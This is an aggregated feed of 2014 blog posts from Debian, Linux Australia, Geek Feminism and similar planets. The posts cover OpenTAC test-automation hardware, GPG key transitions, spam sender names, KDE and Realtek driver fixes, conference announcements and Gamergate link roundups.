There have been ideas about how to improve the situation. Conferences are a prime example – setting up a demo involving LAVA means bringing a range of equipment, separate power bricks, separate network switches (with power bricks), a device of some kind to connect up the USB serial converters (and power brick) and then the LAVA server (with SATA drive and power brick) – that is without the actual devices and their cables and power. Each of those power cables tend to be a metre long, with networking and serial, it quickly becomes a cable spaghetti.

Ideas around this also have application inside larger deployments, so the hardware would need to daisy-chain to provide services to a rack full of test devices.

The objective is a single case providing network, power and serial connectivity to a number of test devices over a single power input and network uplink. Naturally, with a strong free software and open development bias, the unit will be Open Hardware running Debian, albeit with a custom Beaglebone Linux kernel. It’s a Test Automation Controller, so we’re using the name OpenTAC.

Progress

Open hardware ARM device running Debian to automate tests on 4 to 8 devices, initially aimed at LAVA support for Linaro engineers. Power distribution, serial console, network and optional GPIO extensions.

The design involves:

  • A Beaglebone Black (revC)
    • USB hotplug support required, certainly during development.
  • Custom PCB connected as a Beaglebone Cape, designed by Andy Simpkins.
  • Base board provides 4 channels:
    • 5V Power – delivered over USB
    • Ethernet – standard Cat5, no LEDs
    • Serial connectivity
      • RS232
      • UART
    • GPIO
  • Internal gigabit network switch
  • Space for a board like a CubieTruck (with SATA drive) to act as LAVA server
  • Daughter board:
    • Same basic design as the base board, providing another 4 channels, equivalent to the base channels. When the daughter board is fitted, a second network switch would be added instead of the CubieTruck.
  • Power consumption measurement per channel
    • queries made via the Beaglebone Black over arbitrary time periods, including during the test itself.
  • The GPIO lines can be used to work around issues with development boards under test, including closing connections which may be required to get a device to reboot automatically, without manual intervention.
  • Serial connections to test devices can be isolated during device power-cycles – this allows for devices which pull power over the serial connection. (These are typically hardware design issues but the devices still need to be tested until the boards can be modified or replaced.)
  • Thermal control, individual fan control via the Beaglebone Black.
  • 1U case – rackable or used alone on the desk of developers.
  • Software design:
    • lavapdu backend module for PDU control (opentac.py) & opentac daemon on the BBB
      • telnet opentac-01 3225
    • ser2net for serial console control
      • telnet opentac-01 4000

The initial schematics are now complete and undergoing design review. A lot of work remains …

Chaotic IdealismThis Cool Thing My Cat Did

So today I'm walking down a hallway, shoes on and intent to getting to the door because, darn it, if I don't go shopping today I'll have to go a sixth day without a shower curtain. And Tiny, all twelve pounds of inquisitive nannyish boy-cat, comes down the hallway the other way. It's a narrow hallway because the apartment's small and there's a vacuum cleaner on one side of it, so we can't pass by each other comfortably.

Tiny looks at me, looks at my big clunky shoes (which he hates me wearing, since they make me clumsy and noisy), and stops right where he is. He's saying, "Uhh... you first," and thinking "Bzzzzt! Clumsy human sighted! Collision avoidance system activated!"

I look at Tiny and I automatically move to the side of the hallway, pressing myself against the wall. Tiny sees this, his tail goes up, and he marches through the provided gap. He's acknowledging that I've given him the right of way, and he's saying, "Thanks, have a good day!"

I've seen this happen so many times with humans in narrow spaces, but I didn't realize cats did it, too. It shouldn't surprise me that Tiny gets the idea of sharing a narrow hallway, since he's so good at figuring out everything else I do. In fact, I'm pretty sure he gets it better than me--there have been many times when I've run into things, tangled up foot traffic, and generally caused confusion because I couldn't insert myself properly into the rhythm of people walking and sharing a sidewalk. But Tiny gets it.

My cat is awesome.

Planet DebianDirk Eddelbuettel: littler 0.2.1

max-heap image

A new maintenance release of littler is available now.

The main change are a few updates and extensions to the examples provided along with littler. Several of those continue to make use of the wonderful docopt package by Edwin de Jonge. Carl Boettiger and I are making good use of these littler examples, particularly to install directly from CRAN or GitHub, in our Rocker builds of R for Docker (about which we should have a bit more to blog soon too).

Full details for the littler release are provided as usual at the ChangeLog page.

The code is available via the GitHub repo, from tarballs off my littler page and the local directory here. A fresh package has gone to the incoming queue at Debian; Michael Rutter will probably have new Ubuntu binaries at CRAN in a few days too.

Comments and suggestions are welcome via the mailing list or issue tracker at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianThorsten Alteholz: Key transition, move to stronger key

Finally I was able to do the enormous paperwork (no, it is not that much) to switch my old 1024D key to a new 4096R one. I was a bit afraid that there might be something bad happening, but my fear was without any reason. After the RT bug was closed, I could upload and sent signed emails to mailing lists. So thanks alot to everyone involved.

old key, 0xD362B62A54B99890

pub   1024D/54B99890 2008-07-23
      Key fingerprint = 36E2 EDDE C21F EC8F 77B8  7436 D362 B62A 54B9 9890
uid                  Thorsten Alteholz (...)
sub   4096g/622D94A8 2008-07-23


new key, 0xA459EC6715B0705F

pub   4096R/0xA459EC6715B0705F 2014-02-03
  Schl.-Fingerabdruck = C74F 6AC9 E933 B306 7F52  F33F A459 EC67 15B0 705F
uid                 [ uneing.] Thorsten Alteholz (...)
sub   4096R/0xAE861AE7F39DF730 2014-02-03
  Schl.-Fingerabdruck = B8E7 6074 5FF4 C707 1C77  870C AE86 1AE7 F39D F730
sub   4096R/0x96FCAC0D387B5847 2014-02-03
  Schl.-Fingerabdruck = 6201 FBFF DBBD E078 22EA  BB96 96FC AC0D 387B 5847

Geek FeminismLinkspam, fire, and dangerous things (19 October 2014)

Gamergate and online harassment

Other Stuff

  • Ada Lovelace, a Computer Programmer Ahead of Her Time | Mashable (October 15): Read more about the life of the “enchantress of numbers”
  • Ways Men In Tech Are Unintentionally Sexist | this is not a pattern (October 14): “These are little things. Things that many people do without thinking about them and certainly without intending anything by them. Things that individually are meaningless, but in aggregate set the tone of an entire community.”
  • The Malala you won’t hear about | The People’s Record (October 16): “This is the Malala the Western corporate media doesn’t like to quote. This is the Malala whose politics do not fit neatly into the neocolonialist, cookie-cutter frame of presentation. This is the Malala who recognizes that true liberation will take more than just education, that it will take the establishment of not just bourgeois political “democracy,” but ofeconomic democracy, of socialism.”
  • Where’s Thor When You Need Her? Women In Comics Fight An Uphill Battle | NPR (October 10): “On Facebook, women make up just under half of all self-identified comics fans. But even as the female audience grows, female creators for DC and Marvel, colloquially known as “the Big Two,” are still in the minority.”
  • Internal Memo: Microsoft CEO Satya Nadella sets new diversity plan after ‘humbling’ experience | GeekWire (October 15): “The memo, sent prior to a regular monthly Q&A session with employees, went on to outline a series of steps that Nadella says the company will be taking to improve diversity and inclusion across the company, including the company’s engineering and senior leadership teams.”
  • FiveThirtyEight Turns the Lidless Eye of Data Crunching to Gender Disparity in Superhero Comics Characters | The Mary Sue (October 15): “Hanley has been crunching the numbers on the gender make up of the folks who work on Marvel and DC comics for years, but FiveThirtyEight wanted to take a slightly different tack by looking at the characters who make up those comics in the first place.”
  • Mary Berners-Lee: Ada Lovelace Day Hero | equalitism (October 19): “Tim Berners-Lee’s mom, Mary Lee Woods was a badass mathematician/computer scientist before he was. Both of Tim’s parents worked on a team that developed programs in the School of Computer Science, University of Manchester Mark 1, Ferranti Mark 1 and Mark 1 Star computers.”
  • We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

    You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

    Thanks to everyone who suggested links.

    Planet Linux Australialinux.conf.au News: Speaker Feature: Pavel Emelyanov, Alasdair Allan

    Pavel Emelyanov

    Pavel Emelyanov

    Libcontainer: One lib to rule them all

    10:40 pm Friday 16th January 2015

    Pavel Emelyanov is a principal engineer at Parallels working on server virtualization projects. He holds a PhD degree in Applied Mathematics from the Moscow Institute of Physics and Technology. His speaking experience includes the talk on network namespaces at LinuxCon 2009 and the presentation of the Virtuozzo resource management at the joint memory management, storage and filesystem summit in April 2011.

    For more information on Pavel and his presentation, see here. You can follow him as @xemulp and don’t forget to mention #LCA2015.


    Alasdair Allan

    Alasdair Allan

    Open Source Protocols and Architectures to Fix the Internet of Things…

    3:40pm Friday 16th January 2015

    Alasdair is a scientist, author, hacker, tinkerer and co-founder of a startup working on fixing the Internet of Things. He spends much of his time probing current trends in an attempt to determine which technologies are going to define our future.

    He has also written articles for Make magazine. The latest entitled “Pick up your tools and get started!” posted 1 September 2014.

    For more information on Alasdair and his presentation, see here. You can follow him as @aallan and don’t forget to mention #LCA2015.

    Planet Linux AustraliaSridhar Dhanapalan: Twitter posts: 2014-10-13 to 2014-10-19

    Planet Linux AustraliaMark Terle: A preponderance of yak shaving….

    It is often observed that attempting to undertake one task begets another, with the corollary that two days later you’ve built a bikeshed painted in a multitude of colours.

    So, dear readers, this tale of woe begins with the need to update my blog to something useful after 18 months of neglect and more. I had been writing a travel blog from when I took some leave off work to wander the globe. For this task, a new more generic DNS entry and an upgrade to the WordPress installation and syndication with my Advogato blog. Easily accomplished and a sense of progress.

    This blog entry is going to be mostly a technical one. I’ll try incorporating more of real life in other entries.

    Great, now I can tell the world about my little project toying with Vagrant and Puppet.

    It is called “Browser In A Box”. It is up on Github https://github.com/mtearle/browser-in-a-box

    It is very simple, a Vagrant file and a set of Puppet manifests/modules to launch Chromium in kiosk mode inside a VM to hit a certain URL. This is part of planned later work to look at creating a Vagrant development environment for Concerto.

    At this point, I got distracted … aside from the liberal upgrades of bash on various machines to address Shellshock

    Then I accidentally purchased a new Ultrabook. My previous netbook had been getting long in the tooth and it was time to upgrade. I ended up purchasing a Toshiba Satellite NB10, a reasonable processor Intel N2830, 4 Gig of RAM and 500 Gigs of spinning rust. Those are the nice bits.

    On the negatives, Crappy Toshiba keyboard layout with the ~ key in a stupid spot and a UEFI bios. It is now blatantly apparent why Matthew Garrett drinks copious quantities of gin.

    Special brickbats go to the Ubuntu installer for repartitioning and eating my Windows installation and recovery partition. (The option to install over my test Debian installation got over enthusiastic).  The wireless chipset (Atheros) has a known problem where it confuses the access point.

    The next distraction ended up being a fit of procastination in terms of rearranging my tiny apartment. I’ve now modelled it in a program called Sweet Home 3D. Easy and straight forward to use. Needs a few more furniture models, but perfectly functional. I shall use it again next time I move.

    Finally, we arrive at the the original task. I want to start syncing my calendars between various locations (written here for my benefit later).

    They are:

    • Work stream – From my Work (Exchange) to my private host (Radicale) to Google Calendar (which will get to my Android phone)
    • Personal stream – From my private host (Radicale) to Google Calendar (and back again)
    • Party stream – From Facebook’s ical export to my private host and Google Calendar

    In addition, various syncing of contacts but not my primary focus at the moment.

    It appears that syncevolution will do most of what I want here. The challenge revolves around how to get it working. Ultimately, I want to have this live headless hosted on a virtual machine not running a desktop.

    In a fit of enthusiasm, I decided upon attempting to build it from source as opposed to using the packages provided from the upstream (to avoid dragging in unnecessary dependencies.

    I need to build from HEAD due to recent code added to syncevolution to support the change in Google’s CALDAV API to be behind OAuth V2.

    This was not an overly successful exercise, I ended up getting something built but it didn’t ultimately work.

    Problems encountered were:

    • libwbxml2 – The upstream at opensync.org is down. There appears to be forks, so playing the game of guessing the current head/release version.
    • activesyncd – Build system is currently broken in parts. There appears to be bit rot around the evolution bindings as the evolution API has changed

    I gave up at that point. I’ve since spun up a different virtual machine with Debian Jessie and an install of Gnome. The packages from the syncevolution upstream installed cleanly, but have yet to work out the incarnations to make it work. However, that my friends is a story for a later blog entry…

    Planet Linux Australialinux.conf.au News: Multimedia and Music Miniconf - Call for Papers

    The Multimedia and Music Miniconf at LCA2015 will be held in Auckland, New Zealand, on Monday 12 January 2015. We are pleased to formally open the miniconf's Call for Papers. Submissions are encouraged from anyone with a story to tell which is related to open software for multimedia or music.

    Examples of possible presentations include:

    • demonstrations of multimedia content authored using Open Source programs
    • audio recording examples
    • Open Source games
    • video and image editing on Linux
    • new multimedia software being written
    • multimedia web APIs and applications
    • unusual uses of Open Source multimedia software
    • codec news

    In addition, we are planning to hold an informal jam session at the end of the Miniconf, giving community members a change to showcase their compositions and multimedia creations. Expressions of interest for this are also invited. If musical instruments are required it is preferable if participants arranged this themselves, but with sufficient lead time it might be possible to arrange a loan from locals in Auckland.

    The miniconf website at annodex.org/events/lca2015 has further details about the miniconf.

    To submit a proposal or for further information, please email Jonathan Woithe (jwoithe@atrad.com.au) or Silvia Pfeiffer (silviapfeiffer1@gmail.com).

    Jonathan Woithe and Silvia Pfeiffer

    (Multimedia and Music miniconf organisers)

    Planet DebianBenjamin Mako Hill: Another Round of Community Data Science Workshops in Seattle

    Pictures from the CDSW sessions in Spring 2014Pictures from the CDSW sessions in Spring 2014

    I am helping coordinate three and a half day-long workshops in November for anyone interested in learning how to use programming and data science tools to ask and answer questions about online communities like Wikipedia, free and open source software, Twitter, civic media, etc. This will be a new and improved version of the workshops run successfully earlier this year.

    The workshops are for people with no previous programming experience and will be free of charge and open to anyone.

    Our goal is that, after the three workshops, participants will be able to use data to produce numbers, hypothesis tests, tables, and graphical visualizations to answer questions like:

    • Are new contributors to an article in Wikipedia sticking around longer or contributing more than people who joined last year?
    • Who are the most active or influential users of a particular Twitter hashtag?
    • Are people who participated in a Wikipedia outreach event staying involved? How do they compare to people that joined the project outside of the event?

    If you are interested in participating, fill out our registration form here before October 30th. We were heavily oversubscribed last time so registering may help.

    If you already know how to program in Python, it would be really awesome if you would volunteer as a mentor! Being a mentor will involve working with participants and talking them through the challenges they encounter in programming. No special preparation is required. If you’re interested, send me an email.

    ,

    Planet DebianSteve Kemp: On the names we use in email

    Yesterday I received a small rush of SPAM mails, all of which were 419 scams, and all of them sent by "Mrs Elizabeth PETERSEN".

    It struck me that I can't think of ever receiving a legitimate mail from a "Mrs XXX [YYY]", but I was too busy to check.

    Today I've done so. Of the 38,553 emails I've received during the month of October 2014 I've got a hell of a lot of mails with a From address including a "Mrs" prefix:

    "Mrs.Clanzo Amaki" <marilobouabre14@yahoo.co.jp>
    "Mrs Sarah Mamadou"<investment@payment.com>
    "Mrs Abia Abrahim" <missfatimajinnah@yahoo.co.jp>
    "Mrs. Josie Wilson" <linn3_2008@yahoo.co.jp>
    "Mrs. Theresa Luis"<tomaslima@jorgelima.com>
    

    There are thousands more. Not a single one of them was legitimate.

    I have one false-positive when repeating the search for a Mr-prefix. I have one friend who has set his sender-address to "Mr Bob Smith", which always reads weirdly to me, but every single other email with a Mr-prefix was SPAM.

    I'm not going to use this in any way, since I'm happy with my mail-filtering setup, but it was interesting observation.

    Names are funny. My wife changed her surname post-marriage, but that was done largely on the basis that introducing herself as "Doctor Kemp" was simpler than "Doctor Foreign-Name", she'd certainly never introduce herself ever as Mrs Kemp.

    Trivia: In Finnish the word for "Man" and "Husband" is the same (mies), but the word for "Woman" (nainen) is different than the word for "Wife" (vaimo).

    LongNowThe Manual for Civilization takes The Knight Foundation News Challenge

    Manual for Civilization Knight News Challenge

    What captures your imagination about the future of libraries?

    That’s the question asked by The Knight Foundation in an open call for innovative library projects. There have been 680 proposals from around the country, and only a few days remain to give feedback and “Applaud” your favorites.  We think our Manual for Civilization project fits well with The Knight Foundation’s News Challenge funding goal:

    We view libraries as key for improving Americans’ ability to know about and to be involved with what takes place around them. The library has been a vital part of our communities for centuries—as keepers of public knowledge, spaces for human connection, educators for the next generations of learners. While habits are changing, those needs have not. We want to discover projects that help carry the values of libraries into the future.

    Take a moment to read our proposal, comment, and click the Applause button to show your support for the Manual for Civilization. Many projects will be funded to fulfill the News Challenge’s aim of [accelerating] media innovation by funding breakthrough ideas in news and information. Your applause could help the Manual be one of them.

    The Manual for Civilization is a crowd-curated library of the 3500 books most essential to sustain or rebuild civilization. Knight Foundation funds will help us complete our collection of books–including many rare, hard-to-find titles. It would also support live events to engage the community and online initiatives providing broader access to the project. Read more on the News Challenge website.

    Planet DebianErich Schubert: Beware of trolls - do not feed

    A particularly annoying troll has been on his hate crusade against systemd for months now.
    Unfortunately, he's particularly active on Debian mailing lists (but apparently also on Ubuntu and the Linux Kernel mailing list) and uses a tons of fake users he keeps on setting up. Our listmasters have a hard time blocking all his hate, sorry.
    Obviously, this is also the same troll that has been attacking Lennart Poettering.
    There is evidence that this troll used to go by the name "MikeeUSA", and has quite a reputation with anti-feminist hate for over 10 years now.
    Please, do not feed this troll.
    Here are some names he uses on YouTube: Gregory Smith, Matthew Bradshaw, Steve Stone.
    Blacklisting is the best measure we have, unfortunately.
    Even if you don't like the road systemd is taking or Lennart Poetting personall - the behaviour of that troll is unacceptable to say the least; and indicates some major psychological problems... also, I wouldn't be surprised if he is also involved in #GamerGate.
    See this example (LKML) if you have any doubts. We seriously must not tolerate such poisonous people.
    If you don't like systemd, the acceptable way of fighting it is to write good alternative software (and you should be able to continue using SysV init or openRC, unless there is a bug, in Debian - in this case, provide a bug fix). End of story.

    Sociological ImagesChart of the Week: Politicians Following, Not Leading on Same-Sex Marriage

    For those of us in favor of same-sex marriage rights, it’s been an exciting few years. Politicians and legislatures have been increasingly tipping toward marriage equality. Lots of us are commending the powerful and high-profile individuals who have decided to support the cause.

    But, let’s not be too grateful.

    A figure at xkcd puts this in perspective. It traces four pieces of data over time: popular approval and legalization of both interracial marriage and same-sex marriage. It shows that the state-by-state legalization of same-sex marriage is following public opinion, whereas the legalization of interracial marriage led public opinion.

    2

    There’s a reason that we look back at Civil Rights legislation and see leadership. Politicians, litigators, and activists were pushing for rights that the public wasn’t necessarily ready to extend. In comparison, today’s power brokers appear to be following public opinion, changing their mind because the wind is suddenly blowing a new way.

    I’m sure there are politicians out there taking risks at the local level. On the whole, though, this doesn’t look like leadership, it looks like political expedience.

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    Planet Linux AustraliaAndrew Donnellan: KDE 4/Plasma system tray not displaying applications, notifications appearing twice

    So I was trying to get RSIBreak working on my machine today, and for some reason it simply wasn’t displaying an icon in the Plasma system tray as it was meant to.

    It took some searching around, but eventually I came across a comment on a KDE bug report that had the answer.

    I opened up ~/.kde/config/plasma-desktop-appletsrc, searched for “systemtray“, and lo and behold, there were two Containments, both using the systemtray plugin. It seems that at some point during the history of my KDE installation, I ended up with two system trays, just with one that wasn’t visible.

    After running kquitapp plasma to kill the desktop, I removed the first systemtray entry (I made an educated guess and decided that the first one was probably the one I didn’t want any more), saved the file and restarted Plasma.

    Suddenly, not only did RSIBreak appear in my system tray, but so did a couple of other applications which I forgot I had installed. This also fixed the problem I was having with all KDE notifications appearing on screen twice, which was really rather annoying and I’m not sure how I coped with it for so long…


    Filed under: Linux, Uncategorized Tagged: KDE, linux, Linux Tips

    Planet Linux AustraliaAndrew Donnellan: The r8169 driver and mysterious network problems

    A few months ago, a friend of mine was having a problem. When he hooked up his Toshiba laptop to the Ethernet port in his bedroom, it would work under Windows, but not under Linux. When he hooked it up to the port in the room next door, it would work under both.

    I headed over with my Samsung Ultrabook, and sure enough – it worked fine under Windows, but not Linux, while the room next door worked under both.

    As it turns out, both our laptops used Realtek RTL8168-series Ethernet controllers, which are normally handled just fine by the r8169 driver, which can be found in the kernel mainline. However, Realtek also releases a r8168 driver (available in Debian as r8168-dkms). Upon installing that, everything worked fine.

    (At some point I should probably go back and figure out why it didn’t work under r8169 so I can file a bug…)


    Filed under: Hardware, Linux Tagged: Computing, Drivers, linux, Linux Tips

    Don MartiSnapchat ads and committing to non-targeting

    Recent Snapchat blog, announcing ads:

    We want to see if we can deliver an experience that’s fun and informative, the way ads used to be, before they got creepy and targeted. It’s nice when all of the brilliant creative minds out there get our attention with terrific content.

    That's a great idea, and ties in with what I've been saying all along about the targeted ad problem.

    But I'm not optimistic. Snapchat is still running on a mobile phone, running within an environment that's either problematic or outright privacy-hostile. If Snapchat can't commit to its core feature, the idea that photos disappear after sending, how can the company credibly commit to less creepy, more valuable advertising?

    It would be a huge win for Snapchat if they could pull it off. But I doubt that a single app can do it.

    Signalful ads are an emergent benefit from media that tend to build user confidence through tracking resistance. Non-creepiness can't be declared, it has to be discovered.

    Planet DebianRhonda D'Vine: Trans Gender Moves

    Yesterday I managed to get the last ticket from the waitinglist for the premiere of Trans Gender Moves. It is a play about the lives of three people: A transman, a transwoman and an intersexual person. They tell stories from their life, their process of finding their own identity over time. With in parts amusing anecdotes and ones that gets you thinking I can just wholeheartly encourage you to watch it if you have the chance to. It will still be shown the next few days, potentially extending depending on the requests for tickets, from what I've been told by one of the actors.

    The most funny moment for me though was when I was talking with one of the actors about that it really touched me that I was told that one of them will be moving into into the same building I will be moving into in two year's time. Unfortunately that will be delayed a bit because they found me thinks field hamster or the likes in the ground and have to wait until spring for them to move. :/

    /personal | permanent link | Comments: 5 | Flattr this

    Planet Linux AustraliaLev Lafayette: PRINCE2 Checklist and Flowchart

    Recently a simple statement of PRINCE2 governance structures was provided. From this it is possible to derive a checklist for project managers to tick off, just to make sure that everything is done. Please note that this checklist is tailored and combines some functions. For example, there is no Business Review Plan as it is argued that any sensible project should incorporate these into the Business Case and the Project Plan.

    A simple graphic is provided to assist with this process

    read more

    Planet Linux AustraliaLev Lafayette: File Creation Time in Linux

    Linux offers most of the expected file attributes from the command line, including the owner of a file, the group, the size, the date modified and name. However often users want find out when a file was created. This requires a little bit of extra investigation.

    read more

    Worse Than FailureAnnouncements: The New Look is Here

    As you may have noticed, the site looks quite a bit different! As I mentioned back in March, it's been almost seven years since the look and feel of The Daily WTF has been updated, and I was getting pretty tired of the "2003ish" vibe the site had.

    You guys gave some fantastic feedback to help guide the new design, and in July I shared a preview look. After some more feedback - both on the GitHub issue tracker and the forums - we put on the finishing touches and launched the site this evening.

    Of course, it's not perfect - there are a few issues I found when writing this article, and I'm sure we'll find a lot more. But it's a big improvement and, because all of teh codez are on GitHub, it'll be a lot easier to fix things. So if you notice any glitches or have ideas for improvements, please post an issue, submit a pull request, post something in this article's discussion, or contact me directly.

    ,

    CryptogramFriday Squid Blogging: 1,057 Squid T-Shirts

    That's a lot.

    As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

    Commenting has been broken for the past few days. We hope to get it fixed on Monday.

    Planet Linux AustraliaErik de Castro Lopo: Haskell : A neat trick for GHCi

    Just found a really nice little hack that makes working in the GHC interactive REPL a little easier and more convenient. First of all, I added the following line to my ~/.ghci file.

      :set -DGHC_INTERACTIVE
    
    

    All that line does is define a GHC_INTERACTIVE pre-processor symbol.

    Then in a file that I want to load into the REPL, I need to add this to the top of the file:

      {-# LANGUAGE CPP #-}
    
    

    and then in the file I can do things like:

      #ifdef GHC_INTERACTIVE
      import Data.Aeson.Encode.Pretty
    
      prettyPrint :: Value -> IO ()
      prettyPrint = LBS.putStrLn . encodePretty
      #endif
    
    

    In this particular case, I'm working with some relatively large chunks of JSON and its useful to be able to pretty print them when I'm the REPL, but I have no need for that function when I compile that module into my project.

    TEDReflections on TEDGlobal 2014, from the community

    TEDGlobal 2014 brought our conference to the tropics. Here's what the community had to say following this conference all about the theme "South!" Photo: Ryan Lash

    TEDGlobal 2014 brought our conference to the tropics. Here’s what the community had to say following this conference all about the theme “South!” Photo: Ryan Lash

    One of the best things about a week after a conference? The chance to reflect on the experience. In the last week, several TEDGlobal 2014 attendees and community members have shared their thoughts throughout the blogiverse. Below, some highlights:

    Steve Song shared his experience preparing to speak at TED in a post called “Steve and TED’s Excellent Adventure.” “Have you ever found yourself at a party where you felt like if someone discovered who you really were, you would be ejected immediately? That’s a little bit how I’ve felt for the last six months since my invitation to speak at TEDGlobal 2014,” he writes in a wonderful diary. “My dominant emotion in coming away from TEDGlobal — a powerful urge to kick things up a notch.  Several notches, actually.”

    Emmanuelle Roques, an organizer of TEDxBordeaux, used the conference as way to meet people in Rio de Janeiro, Brazil. Rather than watch from the theater, she traveled each day to a different collaborative space that was participating in TEDGlobal Para Todos to watch the livestream with whoever happened to be there. Read her diary.

    Igor Botelho Bernardes calls TEDGlobal a “life-changing” experience. On his site, AsBoasNovas.com (aka “The good news”), he shared a roundup of the Brazilian speakers who took the stage and teased out 15 ideas that he thinks could revolutionize the southern hemisphere. (In Portuguese.)

    Fabiano Serfaty wrote about his TEDGlobal experience through his blog for Veja magazine. Read his highlights,  and an interview with TED Fellow Joe Landolina, who talked about his incredible gel that stops severe bleeding. (In Portuguese.)

    Luke Barbara shares how he crowdfunded his way to TEDGlobal 2014.

    Gabriel Borges posted his diary of the event through ProjetoDraft.com. Read his recaps of day 1, day 2, and day 3 – or skip on over to his final thoughts. (In Portuguese.) 

    Rishad Tobaccowala of Publicis Groupe revealed the three main takeaways that he saw in the TEDGlobal program, including the many ways that the intersection of mobile technology and cloud computing is having an impact.

    Paul Robert Reid admits that he has “Post #TEDGlobal blues.” Another fun read from his site: his recap of visiting Jardim Gramacho, aka Rio’s rubbish dump, where artist Vik Muniz found materials for his work “Waste Land.” 

    And if you too have blogged about watching TED Live or going to the conference — share a link in the comments!


    LongNowMark Lynas: 9 Planetary Boundaries, Finessing the Anthropocene — Seminar Flashback

    “The Holocene is over and welcome to the Anthropocene our very uniquely human geological era.” In March 02012 environmental activist and author Mark Lynas gave a sobering assessment of Earth in the Anthropocene.

    Lynas offers a framework for tracking the health of our planet, outlining nine measurable “boundaries” that if crossed threaten the well-being of humans on Earth. And some already had been crossed in 02012. These systems go beyond climate and biodiversity to measures like ocean acidification, atmospheric aerosols, and excess nitrogen in agriculture.

    Long Now members can watch this video here. The audio is free for everyone on the Seminar page and via podcastLong Now members can see all Seminar videos in HD. Video of the 12 most recent Seminars is also free for all to view.

    <iframe frameborder="no" height="450" scrolling="no" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/44372214&amp;auto_play=false&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;visual=true" width="100%"></iframe>

    From Stewart Brand’s summary of the talk (in full here):

    We’ve raised the temperature of the Earth system, reduced the alkalinity of the oceans, altered the chemistry of the atmosphere, changed the reflectivity of the planet, hugely affected the distribution of freshwater, and killed off many of the species that share the planet with us. [...] Some of those global alterations made by humans may be approaching tipping points—thresholds—that could destabilize the whole Earth system.

    Mark Lynas‘ books include Six Degrees (which Stewart Brand called one of the finest books written on climate), The God Species: How the Planet Can Survive the Age of Humans, and most recently Nuclear 2.0: Why a Green Future Needs Nuclear Power (02014). He is a member of the World Economic Forum’s Global Agenda Council on Decarbonising Energy, which focuses on sustainable energy to mitigate climate change.

    Mark Lynas: Nine Planetary Boundaries, Finessing the Anthropocene

    The Seminars About Long-term Thinking series began in 02003 and is presented each month live in San Francisco. It is curated and hosted by Long Now’s President Stewart Brand. Seminar audio is available to all via podcast.

    Everyone can watch full video of the 12 most recent Long Now Seminars. Long Now members can watch this video in full—you must be logged in to the site—and the full ten years of Seminars in HD. Membership levels start at $8/month and include lots of benefits.

    You can join Long Now here.

    Geek FeminismBuffy the Linkspam Slayer

    • Anita Sarkeesian explains why she canceled USU lecture | Salt Lake City Tribune (October 16): “A nationally known feminist media critic said Wednesday that “it would be irresponsible” to give a lecture amidst mass shooting threats at Utah State University, knowing that police would not screen for weapons at the door. In a phone interview from San Francisco, Anita Sarkeesian said she canceled Wednesday’s lecture not because of three death threats — one of which promised “the deadliest school shooting in American history” — but because firearms would be allowed in spite of the threats.”
    • When gun rights trump public safety | Mary Elizabeth Williams (October 15): “It’s one thing to accept and understand that plenty of reasonable and responsible people own guns and that is their constitutional right. It is another to be so outrageously afraid of legitimate and sane restrictions that you have a situation in which it is entirely permissible to carry a loaded weapon into an event that carries a threat that the people attending it will “die screaming.””
    • The Threats Against Anita Sarkeesian Expose The Darkest Aspects of Online Misogyny | Maureen Ryan (October 15): “The question that’s been haunting many observers for weeks is now right out in the open in the wake of the latest threats leveled at Sarkeesian: Is someone going to have to die for things to change?”
    • #Gamergate Trolls Aren’t Ethics Crusaders; They’re a Hate Group | Jezebel (October 13): “I set about locking down accounts, emailing professors, contacting campus safety, and calling family. It was an exhausting process, but I considered it necessary. The attack could get out of hand. I mentioned offhand to my sister, about two hours in, that “it was getting to be my turn anyways,” to nonchalantly minimize my hurt. That was the moment I broke down. I realized just how much I’d internalized the presumed process: if you’re even asking about equality or diversity in games, being shouted down in a traumatizing manner is now a mandatory step that you have to sit back and endure.”
    • Sweatin’ the Small Stuff, of, Beware Your Throwaway Jokes About Middle-Aged Women in Magic | One General to Rule them All (October 14): “I dare Wizards to give us a major female Magic character (read: Planeswalker) in the next couple of sets who doesn’t have a body that wouldn’t look out of place on a runway or the cover of Playboy. Tamiyo, the Moon Sage was a great start, but that was three blocks ago. Hell, at this point, I’ll take more than one female Planeswalker per set.”
    • AdaCamp: Spending Time with Women in Open Source and Technology | Zara Rahman (October 13): “There were some sessions that really opened my eyes to another area of this ‘open’ bubble- for example, talking about women in open source. Most of the women there were coders, who had contributed to open source code projects; and despite my having read accounts of abuse and harassment within the open source community fairly regularly before, the severity of the situations they face, really hit home for me during this session.
    • Ada Lovelace Day: Meet the 6 women who gave you ‘the computer’ | The Register (October 14): “All six are now sadly no longer with us – Bartik was the last to pass away. But their achievements were profound, not just in terms of inadvertently cementing the name “computer”. In the absence of manuals literally working out how to use this giant, the team of six installed computer programs working from sheets of paper, nimbly unplugging and replugging a rat’s nest of cables and resetting switches.”
    • Don’t Be Fooled by Apple and Facebook, Egg Freezing Is Not a Benefit | The Daily Beast (October 15): “Of all the women Snyder surveyed, nearly 90 percent of them said they did not plan on returning to the tech industry in the future. The incompatibility between motherhood and tech, it seems, runs far deeper than the timing of pregnancy alone. And the problem is so severe that the women who leave almost never want to come back. In this context, the decision to cover egg freezing reads as Silicon Valley at its most typical, deploying a hasty technological stopgap for a cultural problem.”
    • Tech’s Meritocracy Problem | Medium (October 10): “Engineers love to be skeptics — it’s time to bring our skepticism to the concept of meritocracy. If we can be skeptical enough about our own ability to detect merit, and balance it with more objective measurement or outright mitigatory adjustments — we’ll come closer to resembling an actual meritocracy.”
    • HERoes: Genevieve Valentine | Comicosity (October 2): “From journalist to award winning novelist, Genevieve Valentine is now channeling her inner crime boss. She is providing a new voice to a suited up Selina Kyle, starting with this month’s issue of Catwoman. She tells Comicosity about switching the role of female characters in comics and the importance of reader perspective while consuming.”
